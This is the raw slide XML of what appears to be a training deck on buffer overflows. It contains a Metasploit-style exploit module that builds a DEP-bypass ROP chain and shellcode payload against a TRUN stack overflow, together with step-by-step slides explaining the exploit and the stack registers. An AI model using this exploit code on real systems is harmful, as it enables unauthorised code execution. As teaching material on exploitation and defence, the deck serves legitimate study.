                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x77dfd09c, # POP ECX # RETN [RPCRT4.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x62504dfc, # &amp;Writable location [essfunc.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x77e461e1, # POP EDI # RETN [RPCRT4.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x765e4804, # RETN (ROP NOP) [user32.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x777f3836, # POP EAX # RETN [msvcrt.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x90909090, # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nop</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0x77d43c64, # PUSHAD # RETN [ntdll.dll]</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flatten.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>("V*")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>     return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rop_gadgets</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end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>def exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   connect</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rop_chain</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create_rop_chain</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junk = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rand_text_alpha_upper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(target['Offset’])</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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = "TRUN ."+junk + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rop_chain</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make_nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(16) + payload.encoded+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rn</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sock.put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buf</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handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   disconnect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1313139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41D884-DCA6-BB63-E373-396E93853312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="590931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We can see that we copied the entire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>create_rop_chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> function from the rop_chains.txt file generated by the Mona script to our exploit. We begin the exploit method by connecting to the target. Then, we call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>create_rop_chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> function and store the entire chain in a variable called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rop_chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. we create a random text of 2006 characters using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rand_text_alpha_upper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function and store it into a variable called junk. The vulnerability in the application lies in the execution of the TRUN command. Therefore, we create a new variable called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and store the TRUN command, followed by the junk variable that holds 2006 random characters, followed by our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rop_chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. We also add some padding and, finally, the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shellcode to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> variable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Next, we just put the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> variable onto the communication channel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sock.put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Finally, we just call the handler to check for successful exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Let's run this module and check if we can exploit the system or not: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We made it through the DEP protection with ease. We can now perform post- exploitation on the compromised target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5391571-EC2A-3F99-69E4-30013A36FA81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="158620" y="2816155"/>
            <a:ext cx="6064898" cy="2391360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1847480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8C7D03-364E-31CE-C2D8-DFE043FE9F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6001643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Now let us take a brief look at each of these four components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Extended Stack Pointer (or the ESP):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ESP is the CPU register that points to the top of the memory stack. It may hold the memory address of the instruction being executed or the data that is currently at the top of the memory stack. The value in the ESP changes as the program execution follows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Buffer Space:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It is the space that is allocated to the program for its execution. Generally, the information in the buffer should not be allowed to escape the buffer space. This is done by implementing proper input sanitizations and following a secure coding approach.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Extended Base Pointer (or the EBP):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EBP is the CPU register that holds the memory address of the top of the stack. This generally remains fixed during the entire program execution and is used as a reference address for the next instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Extended Instruction Pointer (or the EIP):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EIP controls the flow of execution. It holds the location of the next instruction to be executed by the CPU. EIP is the main target of the buffer overflow attack, as controlling the EIP gives the attacker the control of command execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The Hacker Angle: How Attackers Exploit Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Malicious Input: Attackers carefully craft data that's bigger than the intended buffer size. This data also includes their own malicious code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Overwriting the Return Address: The overflow is designed to overwrite the return address, pointing it towards the injected malicious code instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hijacking Execution: When the function tries to "return," it's tricked into jumping to the attacker's code. Now the attacker can potentially:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Run commands to control the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Steal sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Install other malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Causes of Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
